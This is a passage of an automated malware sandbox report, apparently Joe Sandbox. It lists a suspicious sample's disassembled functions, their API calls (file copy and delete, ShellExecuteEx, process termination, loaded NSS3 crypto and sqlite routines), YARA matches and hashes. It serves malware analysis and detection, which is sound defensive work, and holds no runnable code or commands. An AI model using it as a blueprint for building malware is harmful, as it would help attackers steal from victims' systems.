                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: sqlite3_log
                                                                                                                                              • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                              • API String ID: 632333372-598938438
                                                                                                                                              • Opcode ID: a1d30d9cc792bb0af1f21816b6ad6d505ed647540ce48dd04f10b953f1380fce
                                                                                                                                              • Instruction ID: 126519af548bbbe1cd354441175ccc61fa0aea9f06e3c9030062434c978d00ff
                                                                                                                                              • Opcode Fuzzy Hash: a1d30d9cc792bb0af1f21816b6ad6d505ed647540ce48dd04f10b953f1380fce
                                                                                                                                              • Instruction Fuzzy Hash: 6A311471E042299BC710CFDDC880DBAB7F1EF84709B594596E448B7B8AD270DC42C7A8
                                                                                                                                              Function 6C696C90 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 76COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000134E5,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?), ref: 6C696D36
                                                                                                                                              Strings
                                                                                                                                              • %s at line %d of [%.10s], xrefs: 6C696D2F
                                                                                                                                              • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C696D20
                                                                                                                                              • database corruption, xrefs: 6C696D2A
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: sqlite3_log
                                                                                                                                              • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                              • API String ID: 632333372-598938438
                                                                                                                                              • Opcode ID: fbf1f7f2ccfdc05922cde785e4760a9503b079a7e60315d1951ad91c5b83d2a2
                                                                                                                                              • Instruction ID: 3cc0797cf18f19c7f01b0ef6179f22abbc2394e160a51d4ee27c172615045c54
                                                                                                                                              • Opcode Fuzzy Hash: fbf1f7f2ccfdc05922cde785e4760a9503b079a7e60315d1951ad91c5b83d2a2
                                                                                                                                              • Instruction Fuzzy Hash: 562124706003069BC710CF19C941B9AB7F1AF81308F14892DD8599BFA1E370F949C7EA
                                                                                                                                              Function 004168D0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00416903
                                                                                                                                                • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                                                                                                                • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                                                                                                                                • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                                                                                                                                • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                                                                                                                                • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                                                                                                                              • ShellExecuteEx.SHELL32(0000003C), ref: 004169C6
                                                                                                                                              • ExitProcess.KERNEL32 ref: 004169F5
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2312969222.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_WGo3ga1AL9.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                                                                                                                              • String ID: <
                                                                                                                                              • API String ID: 1148417306-4251816714
                                                                                                                                              • Opcode ID: d3b5e6b6873cb086de3db99bc4d14692344c5d94b2537c956a0bc7566ebf8332
                                                                                                                                              • Instruction ID: 69e214fcc2f82cbe4d830bf51364f862e1744f727ac50a07542482e63681b1c7
                                                                                                                                              • Opcode Fuzzy Hash: d3b5e6b6873cb086de3db99bc4d14692344c5d94b2537c956a0bc7566ebf8332
                                                                                                                                              • Instruction Fuzzy Hash: 82313AB1902218ABDB14EB91DC92FDEB779AF08314F40418EF20566191DF787B88CF69
                                                                                                                                              Function 6C7CCC70 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 6C7CCD70: PR_LoadLibrary.NSS3(ws2_32.dll,?,?,?,6C7CCC7B), ref: 6C7CCD7A
                                                                                                                                                • Part of subcall function 6C7CCD70: PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6C7CCD8E
                                                                                                                                                • Part of subcall function 6C7CCD70: PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6C7CCDA5
                                                                                                                                                • Part of subcall function 6C7CCD70: PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6C7CCDB8
                                                                                                                                              • PR_GetUniqueIdentity.NSS3(Ipv6_to_Ipv4 layer), ref: 6C7CCCB5
                                                                                                                                              • memcpy.VCRUNTIME140(6C8614F4,6C8602AC,00000090), ref: 6C7CCCD3
                                                                                                                                              • memcpy.VCRUNTIME140(6C861588,6C8602AC,00000090), ref: 6C7CCD2B
                                                                                                                                                • Part of subcall function 6C6E9AC0: socket.WSOCK32(?,00000017,6C6E99BE), ref: 6C6E9AE6
                                                                                                                                                • Part of subcall function 6C6E9AC0: ioctlsocket.WSOCK32(00000000,8004667E,00000001,?,00000017,6C6E99BE), ref: 6C6E9AFC
                                                                                                                                                • Part of subcall function 6C6F0590: closesocket.WSOCK32(6C6E9A8F,?,?,6C6E9A8F,00000000), ref: 6C6F0597
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FindSymbol$memcpy$IdentityLibraryLoadUniqueclosesocketioctlsocketsocket
                                                                                                                                              • String ID: Ipv6_to_Ipv4 layer
                                                                                                                                              • API String ID: 1231378898-412307543
                                                                                                                                              • Opcode ID: 5650152da402876eae7f5472696ef4673cbc9a0280232d917dd106263a5b8279
                                                                                                                                              • Instruction ID: 3e64f82219cab482a5ed2d65609f48e4785093b14052f78e066fe3f5cf9af66e
                                                                                                                                              • Opcode Fuzzy Hash: 5650152da402876eae7f5472696ef4673cbc9a0280232d917dd106263a5b8279
                                                                                                                                              • Instruction Fuzzy Hash: F9116DF1B082415EDB309B5B9A0B762BAE8974731CF542839E416CBF42E775C408DBDA
                                                                                                                                              Function 6C731CC0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • PR_LogPrint.NSS3(C_Initialize), ref: 6C731CD8
                                                                                                                                              • PR_LogPrint.NSS3( pInitArgs = 0x%p,?), ref: 6C731CF1
                                                                                                                                                • Part of subcall function 6C8109D0: PR_Now.NSS3 ref: 6C810A22
                                                                                                                                                • Part of subcall function 6C8109D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6C810A35
                                                                                                                                                • Part of subcall function 6C8109D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6C810A66
                                                                                                                                                • Part of subcall function 6C8109D0: PR_GetCurrentThread.NSS3 ref: 6C810A70
                                                                                                                                                • Part of subcall function 6C8109D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6C810A9D
                                                                                                                                                • Part of subcall function 6C8109D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6C810AC8
                                                                                                                                                • Part of subcall function 6C8109D0: PR_vsmprintf.NSS3(?,?), ref: 6C810AE8
                                                                                                                                                • Part of subcall function 6C8109D0: EnterCriticalSection.KERNEL32(?), ref: 6C810B19
                                                                                                                                                • Part of subcall function 6C8109D0: OutputDebugStringA.KERNEL32(00000000), ref: 6C810B48
                                                                                                                                                • Part of subcall function 6C8109D0: _PR_MD_UNLOCK.NSS3(?), ref: 6C810C76
                                                                                                                                                • Part of subcall function 6C8109D0: PR_LogFlush.NSS3 ref: 6C810C7E
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: PrintR_snprintf$CriticalCurrentDebugEnterExplodeFlushOutputR_vsmprintfR_vsnprintfSectionStringThreadTime
                                                                                                                                              • String ID: pInitArgs = 0x%p$C_Initialize
                                                                                                                                              • API String ID: 1907330108-3943720641
                                                                                                                                              • Opcode ID: bb4c86408cc4c19151437d9c69669ad8b65a255210bbcadadb53b26840ede6bf
                                                                                                                                              • Instruction ID: 05269961eeb17e03bf7bc408a976a90dc5f955d8e8262b5714f0bec3d1d0ecca
                                                                                                                                              • Opcode Fuzzy Hash: bb4c86408cc4c19151437d9c69669ad8b65a255210bbcadadb53b26840ede6bf
                                                                                                                                              • Instruction Fuzzy Hash: 4501D234206160DFDB219B66DE0DB6533B5ABC335EF046474E40C86A12DB38E849C7D6
                                                                                                                                              Function 00418EE0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,004196AE,00000000), ref: 00418EEB
                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,004196AE,00000000), ref: 00418EF2
                                                                                                                                              • wsprintfW.USER32 ref: 00418F08
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2312969222.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_WGo3ga1AL9.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Heap$AllocProcesswsprintf
                                                                                                                                              • String ID: %hs
                                                                                                                                              • API String ID: 659108358-2783943728
                                                                                                                                              • Opcode ID: a2d1222b377fc3304f55ce0aa2500adad0c2a2d90715c5043ce73364ad1d5f17
                                                                                                                                              • Instruction ID: abe7276d6e58fd7f286e9bcc6e4dd5022fdd169b0d4b331efbe0e5b16b2cc016
                                                                                                                                              • Opcode Fuzzy Hash: a2d1222b377fc3304f55ce0aa2500adad0c2a2d90715c5043ce73364ad1d5f17
                                                                                                                                              • Instruction Fuzzy Hash: 47E08C70E49308BBDB00DB94ED0AF6D77B8EB44302F000196FD0987340EA719F008B96
                                                                                                                                              Function 0040D500 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                                                                                                                • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                                                                                                                                • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                                                                                                                                • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                                                                                                                                • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                                                                                                                                • Part of subcall function 00418CF0: GetSystemTime.KERNEL32(?,0099BC18,004205B6,?,?,?,?,?,?,?,?,?,004049B3,?,00000014), ref: 00418D16
                                                                                                                                                • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                                                                                                                                • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                                                                                                                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040D581
                                                                                                                                              • lstrlenA.KERNEL32(00000000), ref: 0040D798
                                                                                                                                              • lstrlenA.KERNEL32(00000000), ref: 0040D7AC
                                                                                                                                              • DeleteFileA.KERNEL32(00000000), ref: 0040D82B
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2312969222.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_WGo3ga1AL9.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 211194620-0
                                                                                                                                              • Opcode ID: 759532888ca0f89e6633ed261c1709a6118d35f1903a320477f6818cf873b575
                                                                                                                                              • Instruction ID: cd95120e3309aa2a4ee5e09d67847ecab6e8b781cb92854c7d2ac691bd2160a2
                                                                                                                                              • Opcode Fuzzy Hash: 759532888ca0f89e6633ed261c1709a6118d35f1903a320477f6818cf873b575
                                                                                                                                              • Instruction Fuzzy Hash: CF911672E111089BCB04FBA1EC66DEE7339AF14314F50456EF11672095EF387A98CB6A
                                                                                                                                              Function 6C771D60 Relevance: 6.1, APIs: 4, Instructions: 141memoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • PORT_ArenaMark_Util.NSS3(?), ref: 6C771D8F
                                                                                                                                                • Part of subcall function 6C7614C0: TlsGetValue.KERNEL32 ref: 6C7614E0
                                                                                                                                                • Part of subcall function 6C7614C0: EnterCriticalSection.KERNEL32 ref: 6C7614F5
                                                                                                                                                • Part of subcall function 6C7614C0: PR_Unlock.NSS3 ref: 6C76150D
                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6C771DA6
                                                                                                                                                • Part of subcall function 6C7610C0: TlsGetValue.KERNEL32(?,6C708802,00000000,00000008,?,6C6FEF74,00000000), ref: 6C7610F3
                                                                                                                                                • Part of subcall function 6C7610C0: EnterCriticalSection.KERNEL32(?,?,6C708802,00000000,00000008,?,6C6FEF74,00000000), ref: 6C76110C
                                                                                                                                                • Part of subcall function 6C7610C0: PL_ArenaAllocate.NSS3(?,?,?,6C708802,00000000,00000008,?,6C6FEF74,00000000), ref: 6C761141
                                                                                                                                                • Part of subcall function 6C7610C0: PR_Unlock.NSS3(?,?,?,6C708802,00000000,00000008,?,6C6FEF74,00000000), ref: 6C761182
                                                                                                                                                • Part of subcall function 6C7610C0: TlsGetValue.KERNEL32(?,6C708802,00000000,00000008,?,6C6FEF74,00000000), ref: 6C76119C
                                                                                                                                              • SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6C771E13
                                                                                                                                              • PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C771ED0
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ArenaUtil$Value$CriticalEnterSectionUnlock$Alloc_AllocateArena_FreeItem_Mark_
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 84796498-0
                                                                                                                                              • Opcode ID: a933f0f40cc8fe090bdb0f3d76e191fc95a1409dce884556a03bad0d3e853679
                                                                                                                                              • Instruction ID: dd20e39bd8d5c8d125ce18666e73efbdd844b9df9b91400135df59e343e04d65
                                                                                                                                              • Opcode Fuzzy Hash: a933f0f40cc8fe090bdb0f3d76e191fc95a1409dce884556a03bad0d3e853679
                                                                                                                                              • Instruction Fuzzy Hash: 01515871A003098FDF20CF98C998BAEB7BABF45309F144129E81D9B651D771E945CBA0
                                                                                                                                              Function 6C7D7DE0 Relevance: 6.1, APIs: 4, Instructions: 108COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C7D7E10
                                                                                                                                              • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C7D7EA6
                                                                                                                                              • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C7D7EB5
                                                                                                                                              • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000), ref: 6C7D7ED8
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: _byteswap_ulong
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 4101233201-0
                                                                                                                                              • Opcode ID: 68fd819e4aa8e36df1224ea11687829a8446297eaaca2911829ad9927b1d0bc6
                                                                                                                                              • Instruction ID: ca953dca079135f844295b47b1094b7cf72aa420bc4cf61b632c7113d3f27a6a
                                                                                                                                              • Opcode Fuzzy Hash: 68fd819e4aa8e36df1224ea11687829a8446297eaaca2911829ad9927b1d0bc6
                                                                                                                                              • Instruction Fuzzy Hash: 0831A4B1A001128FDB04CF09C99099ABBE6BF88318B1B8579C8585BB15EB71EC45CBD1
                                                                                                                                              Function 6C706C50 Relevance: 6.1, APIs: 4, Instructions: 102memoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6C706C8D
                                                                                                                                              • memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6C706CA9
                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6C706CC0
                                                                                                                                              • SEC_ASN1EncodeItem_Util.NSS3(?,00000000,?,6C828FE0), ref: 6C706CFE
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Util$Alloc_Arena$EncodeItem_memset
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2370200771-0
                                                                                                                                              • Opcode ID: b2c500e6563c5aaa55c3d74c2843a04c2b1880819d9ab8c088b3982e5c1b1007
                                                                                                                                              • Instruction ID: 00a368b289f08da3bcb8f152c4185e5c729c29dd27104a85c629bc6fffd401bc
                                                                                                                                              • Opcode Fuzzy Hash: b2c500e6563c5aaa55c3d74c2843a04c2b1880819d9ab8c088b3982e5c1b1007
                                                                                                                                              • Instruction Fuzzy Hash: 9F318EB1A002169FEB08CF65C995ABFBBF5EF85248B10443DDD05E7700EB31AA45CBA0
                                                                                                                                              Function 00419660 Relevance: 6.1, APIs: 4, Instructions: 89COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • memset.MSVCRT ref: 0041967B
                                                                                                                                                • Part of subcall function 00418EE0: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,004196AE,00000000), ref: 00418EEB
                                                                                                                                                • Part of subcall function 00418EE0: HeapAlloc.KERNEL32(00000000,?,?,004196AE,00000000), ref: 00418EF2
                                                                                                                                                • Part of subcall function 00418EE0: wsprintfW.USER32 ref: 00418F08
                                                                                                                                              • OpenProcess.KERNEL32(00001001,00000000,?), ref: 0041973B
                                                                                                                                              • TerminateProcess.KERNEL32(00000000,00000000), ref: 00419759
